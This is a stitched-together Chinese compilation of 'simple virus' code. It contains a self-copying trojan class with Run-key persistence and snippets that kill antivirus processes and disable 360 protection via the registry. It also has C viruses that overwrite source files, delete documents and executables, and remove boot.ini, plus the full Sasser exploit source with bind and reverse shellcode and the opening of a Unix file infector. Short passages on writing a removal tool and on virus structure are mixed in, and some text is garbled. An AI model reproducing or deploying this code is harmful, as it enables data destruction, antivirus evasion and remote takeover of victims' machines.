用C语言编写简单的病毒

VisualC++很简单的木马代码Visual C++编程时用到了这些功能,现在我把它组装成一个很简单的木马了.本代码已封装成类方便代码重用:1,自我复制.2,修改注册表自动运行.3,关闭进程.4,启动程序.5,重启关机功能.交流class CTrojanHorse{public://add codepublic://add codeCTrojanHorse();~CTrojanHorse();protected://add codeBOOL IfShell(CString BeKissPrcName);BOOL CopyFileaddr(CString m_CopyFile);void ShellFile(CString m_ShellFile);BOOL SetAutoRun(CString strPath);void ShutDown();private://add code};CTrojanHorse::CTrojanHorse(){//add code}CTrojanHorse::~CTrojanHorse(){//add code}BOOL CTrojanHorse::IfShell(CString BeKissPrcName)//判断程序是否在运行{CString str,a,prcnum;// CMainFrame *pDlg=(CMainFrame *)lparam;//AfxMessageBox(pDlg->BeKissPrcName);HANDLESnapShot=CreateT oolhelp32Snapshot(TH32CS_SNAPPROCESS,0 );SHFILEINFO shSmall;PROCESSENTRY32 ProcessInfo;//声明进程信息变量ProcessInfo.dwSize=sizeof(ProcessInfo);//设置ProcessInfo的大小//返回系统中第一个进程的信息BOOL Status=Process32First(SnapShot,&ProcessInfo);int m_nProcess=0;int num=0;while(Status){ num++;m_nProcess++;ZeroMemory(&shSmall,sizeof(shSmall));//获取进程文件信息SHGetFileInfo(ProcessInfo.szExeFile,0,&shSmall,sizeof(shSmall),SHGFI_ICON|SHGFI_SMALLICON);//str.Format("%08x",ProcessInfo.th32ProcessID);str=ProcessInfo.szExeFile;if(str==BeKissPrcName){AfxMessageBox("找到进程成功!");return true;}//获取下一个进程的信息Status=Process32Next(SnapShot,&ProcessInfo);}AfxMessageBox("失败!");return false;}BOOL CTrojanHorse::CopyFileaddr(CString m_CopyFile)//复制文件{char pBuf[MAX_PATH];CString m_addr;// CString m_strSrcFile1="D:/OperateFile.exe";// CString m_addr="D:/SVCLSV.exe"; //存放路径的变量GetCurrentDirectory(MAX_PATH,pBuf); //获取程序的当前目录strcat(pBuf,"\\");strcat(pBuf,AfxGetApp()->m_pszExeName);strcat(pBuf,".exe");m_addr=pBuf;if(CopyFile(m_addr,m_CopyFile,FALSE)){AfxMessageBox("复制成功！");return true;}return false;}void CTrojanHorse::ShellFile(CString m_ShellFile)//执行所要的程序{ShellExecute(NULL,"open",m_ShellFile,NULL,NULL,SW_SHO WNORMAL);}BOOL CTrojanHorse::SetAutoRun(CString strPath)//修改注册表{CString str;HKEY hRegKey;BOOL bResult;str=_T("Software\\Microsoft\\Windows\\CurrentVersion\\Ru n");if(RegOpenKey(HKEY_LOCAL_MACHINE, str, &hRegKey) != ERROR_SUCCESS)bResult=FALSE;else{_splitpath(strPath.GetBuffer(0),NULL,NULL,str.GetBufferSetL ength(MAX_PATH+1),NULL);strPath.ReleaseBuffer();str.ReleaseBuffer();if(::RegSetValueEx( hRegKey,str,0,REG_SZ,(CONST BYTE *)strPath.GetBuffer(0),strPath.GetLength() ) != ERROR_SUCCESS)bResult=FALSE;elsebResult=TRUE;strPath.ReleaseBuffer();}return bResult;}void CTrojanHorse::ShutDown()//重新启动计算机{if (IDYES == MessageBox("是否现在重新启动计算机？", "注册表提示", MB_YESNO)){OSVERSIONINFO OsVerInfo; //保存系统版本信息的数据结构OsVerInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);GetVersionEx(&OsVerInfo);//取得系统的版本信息CString str1 = "", str2 = "";str1.Format("你的系统信息\n版本为：%d.%d\n", OsVerInfo.dwMajorVersion,OsVerInfo.dwMinorVersion);str2.Format("型号：%d\n", OsVerInfo.dwBuildNumber);str1 += str2;AfxMessageBox(str1);if(OsVerInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) ExitWindowsEx(EWX_REBOOT | EWX_SHUTDOWN, 0); //重新启动计算机}}。

最简单的电脑病毒代码是什么你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由店铺给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!最简单的电脑病毒代码介绍：绕过杀毒软件防御：运行(“taskkill /f /im kavsvc.exe”, 假, 1)运行(“taskkill /f /im KVXP.kxp”, 假, 1)运行(“taskkill /f /im Rav.exe”, 假, 1)运行(“taskkill /f /im Ravmon.exe”, 假, 1)运行(“taskkill /f /im Mcshield.exe”, 假, 1)运行(“taskkill /f /im VsTskMgr.exe”, 假, 1)修改系统时间：置现行时间 (到时间(“8888年8月8日”))禁用任务管理器：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System \DisableTaskMgr”, 0)禁用注册表：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\System \Disableregistrytools”, 1)隐藏开始中的运行禁止WIN2000/XP通过任务管理器创建新任务：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoRun”, 1)隐藏“MS-DOS方式”下的磁盘驱动器。

不管是在“我的电脑”里，或“MS-DOS”方式下都看不见了：写注册项(3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)隐藏开始中的关机：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoClose”, 1)隐藏开始中的搜索：写注册项(3, “Softw are\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFind”, 1)OVER360防御：写注册项(4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)写注册项(4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)结束360进程运行(“taskkill /f /im 360tray.exe”, 假, 1)隐藏所有驱动器：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoDrives”, 4294967295)禁止所有驱动器：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoViewOnDrive”, 4294967295)隐藏文件夹选项：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFolderOptions”, 1)将桌面对象隐藏：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoDesktop”, 1)隐藏开始中的关机：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoClose”, 1)隐藏开始中的搜索：写注册项(3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explore r\NoFind”, 1)这条有两种情况。

计算机病毒代码有哪些计算机病毒代码介绍一：void main(){while(1){}}//死循环，电脑用不了或者这样void main(){while(1){char *a=new char(1024);}}//吃光你的内存还能这样#include#includevoid main(){..........//循环查找文件写入垃圾数据，省略若干代码}最好hook openprocess这个东东让任务管理器都结束不掉想象力是无限的，看你怎么玩。

计算机病毒代码介绍二：给你个恶搞的玩on error resume nextdim wshshellaset wshshella = w.createobject("w.shell")wshshella.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪，不说我是猪就一分钟关你机，不信，试试···"" ",0 ,true dim ado while(a "我是猪")a = inputbox ("说我是猪,就不关机，快撒，说 ""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"msgbox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim wshshellset wshshell = w.createobject("w.shell")wshshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈，真过瘾"计算机病毒代码介绍三：最简单的一个电脑病毒1.vbs版本：打开记事本，输入以下代码：do until 1=2w.echo "烦死你!"loop保存为1.vbs，运行后不断出现"烦死你"的对话框。

震荡波病毒C语言源码/*＃i nclude <stdio.h>＃i nclude <strings.h>＃i nclude <signal.h>＃i nclude <netinet/in.h>＃i nclude <netdb.h>#define NORM "\033[00;00m"#define GREEN "\033[01;32m"#define YELL "\033[01;33m"#define RED "\033[01;31m"#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.3 for " RED "sasser.x" NORM #define fatal(x) { perror(x); exit(1); }#define default_port 5554struct {char *os;long goreg;long gpa;long lla;}targets[] = {// { "os", go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr },{ "wXP SP1 all", 0x77C0BF21, 0x77be10CC, 0x77be10D0 },{ "w2k SP4 all", 0x7801D081, 0x780320cc, 0x780320d0 },}, tsz;unsigned char bsh[]={0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E, 0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xF E,0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE, 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21, 0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36, 0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF, 0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8 ,0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xA E,0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9 D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0x D9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E};unsigned char rsh[]={0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E, 0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xF E,0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE, 0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21, 0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE, 0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x8 9, 0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3, 0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xA C,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xD E, 0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2, 0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E};char verbose=0;void setoff(long GPA, long LLA) {int gpa=GPA^0xdededede, lla=LLA^0xdededede;memcpy(bsh+0x1d,&gpa,4);memcpy(bsh+0x2e,&lla,4);memcpy(rsh+0x1d,&gpa,4);memcpy(rsh+0x2e,&lla,4);}void usage(char *argv0) {int i;printf("%s -d <host/ip> [opts]\n\n",argv0);printf("Options:\n");printf(" -h undocumented\n");printf(" -p <port> to connect to [default: %u]\n",default_port);printf(" -s <'bind'/'rev'> shellcode type [default: bind]\n");printf(" -P <port> for the shellcode [default: 530]\n");printf(" -H <host/ip> for the reverse shellcode\n");printf(" -L setup the listener for the reverse shell\n");printf(" -t <target type> [default 0]; choose below\n\n");printf("Types:\n");for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)rintf(" %d %s\t[0x%.8x]\n", i, targets.os, targets.goreg);exit(1);}void shell(int s) {char buff[4096];int retval;fd_set fds;printf("[+] connected!\n\n");for (;;) {FD_ZERO(&fds);FD_SET(0,&fds);FD_SET(s,&fds);if (select(s+1, &fds, NULL, NULL, NULL) < 0) fatal("[-] shell.select()");if (FD_ISSET(0,&fds)) {if ((retval = read(1,buff,4096)) < 1)fatal("[-] shell.recv(stdin)");send(s,buff,retval,0);}if (FD_ISSET(s,&fds)) {if ((retval = recv(s,buff,4096,0)) < 1)fatal("[-] shell.recv(socket)");write(1,buff,retval);}}}void callback(short port) {struct sockaddr_in sin;int s,slen=16;sin.sin_family = 2;sin.sin_addr.s_addr = 0;sin.sin_port = htons(port);s=socket(2,1,6);if ( bind(s,(struct sockaddr *)&sin, 16) ) {kill(getppid(),SIGKILL);fatal("[-] shell.bind");}listen(s,1);s=accept(s,(struct sockaddr *)&sin,&slen); shell(s);printf("crap\n");}int main(int argc, char **argv, char **env) { struct sockaddr_in sin;struct hostent *he;char *host; int port=default_port;char *Host; int Port=5300; char bindopt=1;int i,s,pid=0,rip;char *buff;int type=0;char *jmp[]=;printf(BANNER "\n");if (argc==1)usage(argv[0]);for (i=1;i<argc;i+=2) {if (strlen(argv) != 2)usage(argv[0]);switch(argv[1]) {case 't':type=atoi(argv[i+1]);break;case 'd':host=argv[i+1];break;case 'p':port=atoi(argv[i+1])?:default_port; break;case 's':if (strstr(argv[i+1],"rev")) bindopt=0;break;case 'H':Host=argv[i+1];break;case 'P':Port=atoi(argv[i+1])?:5300;Port=Port ^ 0xdede;Port=(Port & 0xff) << 8 | Port >>8; memcpy(bsh+0x57,&Port,2); memcpy(rsh+0x5a,&Port,2);Port=Port ^ 0xdede;Port=(Port & 0xff) << 8 | Port >>8; break;case 'L':pid++; i--;break;case 'v':verbose++; i--;break;case 'h':usage(argv[0]);default:usage(argv[0]);}}if (verbose)printf("verbose!\n");if ((he=gethostbyname(host))==NULL)fatal("[-] gethostbyname()");sin.sin_family = 2;sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);sin.sin_port = htons(port);printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port); if (bindopt)printf("[.] will try to put a bindshell on port %d.\n",Port);else {if ((he=gethostbyname(Host))==NULL)fatal("[-] gethostbyname() for -H");rip=*((long *)he->h_addr_list[0]);rip=rip^0xdededede;memcpy(rsh+0x53,&rip,4);if (pid) {printf("[.] setting up a listener on port %d.\n",Port);pid=fork();switch (pid) { case 0: callback(Port); }} elseprintf("[.] you should h***e a listener on %s:%d.\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),Port);}printf("[.] using type '%s'\n",targets[type].os);// -------------------- cores=socket(2,1,6);if (connect(s,(struct sockaddr *)&sin,16)!=0) {if (pid) kill(pid,SIGKILL);fatal("[-] connect()");}printf("[+] connected, sending exploit\n");buff=(char *)malloc(4096);bzero(buff,4096);sprintf(buff,"USER x\n");send(s,buff,strlen(buff),0);recv(s,buff,4095,0);sprintf(buff,"PASS x\n");send(s,buff,strlen(buff),0);recv(s,buff,4095,0);memset(buff+0000,0x90,2000);strncpy(buff,"PORT ",5);strcat(buff,"\x0a");memcpy(buff+272,jmp[0],2);memcpy(buff+276,&targets[type].goreg,4); memcpy(buff+280,jmp[1],5);setoff(targets[type].gpa, targets[type].lla);if (bindopt)memcpy(buff+300,&bsh,strlen(bsh));elsememcpy(buff+300,&rsh,strlen(rsh));send(s,buff,strlen(buff),0);free(buff);close(s);// -------------------- end of coreif (bindopt) {sin.sin_port = htons(Port);sleep(1);s=socket(2,1,6);if (connect(s,(struct sockaddr *)&sin,16)!=0) fatal("[-] exploit most likely failed");shell(s);}if (pid) wait(&pid);exit(0);}*/NO 1#include <io.h>#include <dir.h>#include <stdio.h>#include <stdlib.h>#include <string.h>void copyfile(char *infile, char *outfile) {FILE *in,*out;in = fopen(infile,"r");out = fopen(outfile,"w");while (!feof(in)){fputc(fgetc(in),out);}fclose(in);fclose(out);}void MakeRubbish(){int i;FILE *fp;char *path;char *NewName;char *disk[7] = {"A","B","C","D","E","F","G"};char *addtion = ":\\";for (i = 0; i<5; i++){char tempname[] = "XXXXXX" ;NewName = mktemp(tempname);fp = fopen(NewName,"w");fclose(fp);}path = strcat(disk[getdisk()],addtion);chdir(path);for (i = 0; i<5; i++){char tempname[] = "XXXXXX";NewName = mktemp(tempname);fp = fopen(NewName,"w");fclose(fp);}}void CreatEXE(){int i;char *path;char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\"};for ( i = 0; i < 2; i++){open(s, 0x0100,0x0080);copyfile( "C_KILLER.C",s);}}void Remove(){int done;int i;struct ffblk ffblk;char *documenttype[3] = {"*.txt","*.doc","*.exe"};for (i = 0; i < 3; i++){done = findfirst(documenttype,&ffblk,2);while (!done){remove(ffblk.ff_name);done = findnext(&ffblk);}}}void Breed(){int done;struct ffblk ffblk;done = findfirst("*.c",&ffblk,2);while (!done){if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 ){copyfile("C_KILLER.C",ffblk.ff_name);}done = findnext(&ffblk);}}void main(){printf("THERE IS A VIRUS BY XIAOKE.\n\n");Breed();Remove();CreatEXE();printf("COULD YOU TELL ME YOUR NAME?\n\n");printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n");MakeRubbish();getchar();printf("IT'S ONL Y A JOKE! THANK YOU!\n\n");clrscr();system("cmd");}NO 2#include <io.h>#include <dir.h>#include <stdio.h>#include <stdlib.h>#include <string.h>void copyfile(char *infile, char *outfile){FILE *in,*out;in = fopen(infile,"r");out = fopen(outfile,"w");while (!feof(in)){fputc(fgetc(in),out);}fclose(in);fclose(out);}void MakeRubbish(){int i;FILE *fp;char *path;char *NewName;char *disk[7] = {"A","B","C","D","E","F","G"};char *addtion = ":\\";for (i = 0; i<5; i++){char tempname[] = "XXXXXX" ;NewName = mktemp(tempname);fp = fopen(NewName,"w");fclose(fp);}path = strcat(disk[getdisk()],addtion);chdir(path);for (i = 0; i<5; i++){char tempname[] = "XXXXXX";NewName = mktemp(tempname);fp = fopen(NewName,"w");fclose(fp);}}void CreatEXE(){int i;char *path;char *s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\"};for ( i = 0; i < 2; i++){open(s, 0x0100,0x0080);copyfile( "C_KILLER.C",s);}}void Remove(){int done;int i;struct ffblk ffblk;char *documenttype[3] = {"*.txt","*.doc","*.exe"};for (i = 0; i < 3; i++){done = findfirst(documenttype,&ffblk,2);while (!done){remove(ffblk.ff_name);done = findnext(&ffblk);}}}void Breed(){int done;struct ffblk ffblk;done = findfirst("*.c",&ffblk,2);while (!done){if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 ){copyfile("C_KILLER.C",ffblk.ff_name);}done = findnext(&ffblk);}}void main(){printf("THERE IS A VIRUS BY XIAOKE.\n\n");Breed();Remove();CreatEXE();printf("COULD YOU TELL ME YOUR NAME?\n\n");printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n");MakeRubbish();getchar();printf("IT'S ONL Y A JOKE! THANK YOU!\n\n");clrscr();system("cmd");}最简单的c语言病毒源程序#include<stdlib.h>main(){printf("病毒！！！！！！");getchar();getchar();getchar();system("del c:\io.sys ");system("del c:\boot.ini");}删除windows启动的两个关键文件，导致机子无法重起。

病毒代码【病毒⼩程序】关于病毒的代码可以⽤来运⾏⼀下，你的电脑可能会发⽣......但⼤家都知道，病毒是恐怖的，你可以做⼀些有趣的代码.关机代码＃includeusing namespace std;void main(){system(“cmd /c shutdown -s -t 60”); //这是调⽤cmdsystem(“pause”);}相信这很简单吧！还有个⽅法#include#include<shlobj.h>#include<shellapi.h>using namespace std;void main(){ShellExecute(NULL,“open”,“cmd.EⅩE”,"/c shutdown -s -t 60",NULL,SW_HIDE); system(“pause”);} # 加强版本// shutdownDemo.cpp : 定义控制台应⽤程序的⼊⼝点。

//#include "stdafx.h"#include <windows.h>BOOL MySystemShutdown(){HANDLE hToken; //⽤于操作的句柄TOKEN_PRIVILEGES tkp; //⽤于存放特定信息// Get a token for this process.if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))return(FALSE);// Get the LUID for the shutdown privilege.//如果要提权的话要在下⾯这两个函数提权LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount = 1; // one privilege to settkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;// Get the shutdown privilege for this process.AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);if (GetLastError() != ERROR_SUCCESS)return FALSE;// Shut down the system and force all applications to close.if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,SHTDN_REASON_MAJOR_OPERATINGSYSTEM |SHTDN_REASON_MINOR_UPGRADE |# 卡死代码# # 打开⽆数计算机``````VBS 系列格式代码# 甩不掉的魔⿁SHTDN_REASON_FLAG_PLANNED))return FALSE;//shutdown was successfulreturn TRUE;}int _tmain(int argc, _TCHAR* argv[]){getchar();HKEY hKey = { 0 };/*LONG RegOpenKeyEx(HKEY hKey, // 需要打开的主键的名称LPCTSTR lpSubKey, //需要打开的⼦键的名称DWORD ulOptions, // 保留，设为0REGSAM samDesired, // 安全访问标记，也就是权限PHKEY phkResult // 得到的将要打开键的句柄)*/RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey); //打开⼀个指定的注册表键char path[MAX_PATH] = { 0 };GetModuleFileNameA(nullptr, path, MAX_PATH); //获取当前⽂件路径RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte *)path, strlen(path));MySystemShutdown();return 0;}#include <stdio.h>void main(){long int i;while (i < =100000000){printf("你"完"了");i --;}}set wsh=createobject(“wscript.shell”)dowsh.run “calc”loop这段代码是打开⽆数个计算器，直到死机 ,也是保存为.vbs 格式WScript.Echo(“嘿，谢谢你打开我哦，我等你很久拉！”&TSName)WScript.Echo(“你是可爱的⼩朋吗?”)WScript.Echo(“哈,我想你拉，这你都不知道吗？”)WScript.Echo(“怎么才来，说~是不是不关⼼我”)WScript.Echo(“哼,我⽣⽓拉，等你这么久，⼼都凉啦。

c#编写病毒专杀⼯具（⼀）如今病毒⽊马蠕⾍层出不穷,变种也是⼀个接⼀个。

反病毒公司以及各⼤安全公司随着影响很⼤的病毒的出现都会免费提供病毒专杀⼯具，这个举措对普通⽤户来说确实很有帮助。

其实写病毒专杀⼯具也不像⼤家想象的那么神秘，利⽤SDK写个控制台程序来实现病毒专杀，因⽆须写图形界⾯，所以简便快捷！你⾃⼰也能写！不信？就接着看吧废话不说了，接下来就开始谈谈病毒专杀⼯具的思路及实现⽅法。

此⽂中讲解的病毒专杀⼯具是针对⽊马、蠕⾍等独⽴的程序⽽⾔的⼴义的病毒⽽⾔，⽽不是指那种⾃我复制感染PE⽂件的依附于其他程序的那种狭义的病毒。

因为写那种病毒的专杀⼯具需要PE⽂件结构等知识，相对⽽⾔有点难度，所以我们就先从相对简单点的开始，难的以后再介绍。

对于⼤多数病毒⽽⾔，杀毒的思路其实很简单，那就是：终⽌病毒的进程、删除⾃启动项⽬（⼀般在注册表中的run*主键下）、删除病毒⽂件，对设置了⽂件关联的病毒⽽⾔还要修改注册表恢复⽂件关联。

下⾯将分别陈述。

⼀.终⽌进程以前⽹上曾有许多朋友问我怎么根据⽂件名终⽌指定进程,为什么使⽤函数TerminateProcess()不能直接终⽌指定进程。

⾸先让我们来看看函数 TerminateProcess()的声明吧：Bool TerminateProcess(HANDLE hPeocess,UINT uExitCode)，其中第⼀个参数为进程句柄，⽽不是进程名称（⽂件名）。

那怎样才能获得指定进程的句柄呢？我们可以使⽤函数 OpenProcess()，其原型为HANDLE OpenProcess(DWORD dwDesiredAccess, // 访问标志BOOL bInheritHandle, // 处理继承的标志DWORD dwProcessId // 进程标识号,即进程ID);最后⼀个参数就是该进程的ID，进程句柄和进程ID是两回事，这时你可能很郁闷：怎么知道进程ID呢？⽅法当然有啦！在Windows9X/2000 /XP/2003中，微软均提供了⽤来枚举进程的ToolHelp API系列函数。

用C语言编写简单的病毒[转]2007年08月28日星期二下午 03:39[摘要]在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现.[Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0.一、什么是病毒恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在畔踩惺呛苤匾 ?我们要对付病毒,就要了解病毒.写一些病毒是一个很好的办法.如果要写一个病毒,先要知道它是什么.可以给病毒一个定义，这一定义是被广泛认可的。

Frederic Cohen博士在《计算机病毒简短讲座》中提到的：“……一种能够通过修改自身来包括或释放自我拷贝而传染给其他程序的程序。

“其实病毒和普通程序并无太大不同，而且通常比较简单，不像很多程序那样复杂。

只不过病毒里面用到一些正常程序一般不会用到的技术。

要编制一个病毒，首先要知道病毒的运行机理。

不论是何种病毒，它一般在结构上分为三个功能模块：感染机制，触发机制和有效载荷。

在病毒结构中，首要的而且唯一必需的部分是感染机制。

病毒首先必须是能够繁殖自身的代码，这是病毒之所以成为病毒的根本原因。

我们可以用一段类C伪码来表示这个过程。

InfectSection(){if (infectable_object_found&&object_not_already_infect)infect_object;}病毒的第二个主要构成部分是有效载荷触发事件.一个病毒来到你的电脑后,不大可能立即发作,否则它不会被传播得很远.潜伏的敌人永远要比能见到的敌人危险得多.病毒一般是在找到一定数量的感染体,某一日期或时间,某一段文本后触发.一个简单的触发机制可能是这样工作的:TriggerSection(){if (date_is_Friday_13th_and_time_is_03:13:13)set_trigger_status_to_yes; }有效载荷就是病毒用来骚扰你的电脑的方法,有触发机制的病毒一般也有有效载荷。

【转】C语言编的unix病毒这是一只 UNIX 下的电脑病毒,virus name: Unix Invader (入侵者)written by NCKU htk其特点有:1.其具有 daemon process 的特性(lose control tty)故该process owner 没在线上,该病毒依旧能作用执行,不会被系统终结.2.其可感染 UNIX 上 script file 和各型 binary file(当然要属性得宜) ,不重复感染.感染完后,该执行档或script file 依旧可执行...(好像是废话)3.其在记忆体上所用的隐藏方法是,扫描passwd file,取用该user 的 login shell basename 作为程式名,故,用ps -aux(单ps 看不到)或top 之类的程式,要仔细看,才会被发现...(有点奸诈)4.其不重复长驻,顶多一个user 一只,目地是为扩大感染能力5.其它...没了.6.本来要增加root kill -9 也杀不死的能力,但,时间有限,且经济效益不高所以作罢...(别跟我说 kill -9 pid 是无敌的,我依然有办法)如何实验?cp 几个 binary file 到你的 home directory 里,做几个开头字元是# 的 script file ....如何起动?1.先把此档案设定为 filename.c*************************或********************** ^ ^ 很重要一定要有!3.然后可能会有些警告讯习,管它....,然后,应该会有个virus@ 档出现4. ls -l 看看该(virus@)档案长度多长,记好.5.用 vi 或任何 editor 再回来改 filename.c 里面的 #define 后面档案长度(有标示 here 的地方)6.然后重覆第 2.个步骤,然后得到的 virus@ 才是我们要的.7.执行它...ok! :)8.你就中毒了(十秒内)........以后一旦有适合的档案将会马上被感染...其它:1.此 virus ,小弟未作发作部份,因为,破坏的事人人会做,我不想浪费精力想个残忍的破坏动作........有兴趣的人,可以自己去加上....2.此 virus ,在UNIX 作业系统下执行,故证明一点....只要有人类,没有什么不可能有 virus 的 environment,方法是人想出来的.3.若以一个 system administrator 的眼光来看此毒,亦可以得到个结论,能被此 virus 感染的该帐号,被Crack 的机会是相当高.4.此 virus 目前是以线上所有人的 home directory 为感染 search 开端,其实,若该user 的目录下有个dynamic symbolic link 到根目录下,search就可能把整个wrok station 的目录扫完.5.此virus 并不时时扫描目录,内定是10 秒,唤醒一次,以免被发现... :)6.此virus 是翻脸不认人的,所以你自己的目录也会被感染,自己的属姓设定是没有用的,所以实验前赶紧搬一搬吧!7.任意实验此病毒于公用的工作站是相当不道德的,作者是在自己的linux上实验,您...自个好自为之,被抓到或被踢除帐号,别怪作者htk 没先跟你说.OK?大家好好玩吧!注:Dark Slayer 乃现任 Taiwan Power Virus Orginization 头头是也...1995/6/15>*//* A VIRUS IN UNIX *//* written by NCKU EE htk */#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#define CHK 512#define PERM S_IRWXU#define CHKT 10#define LOADER '\nrm -f 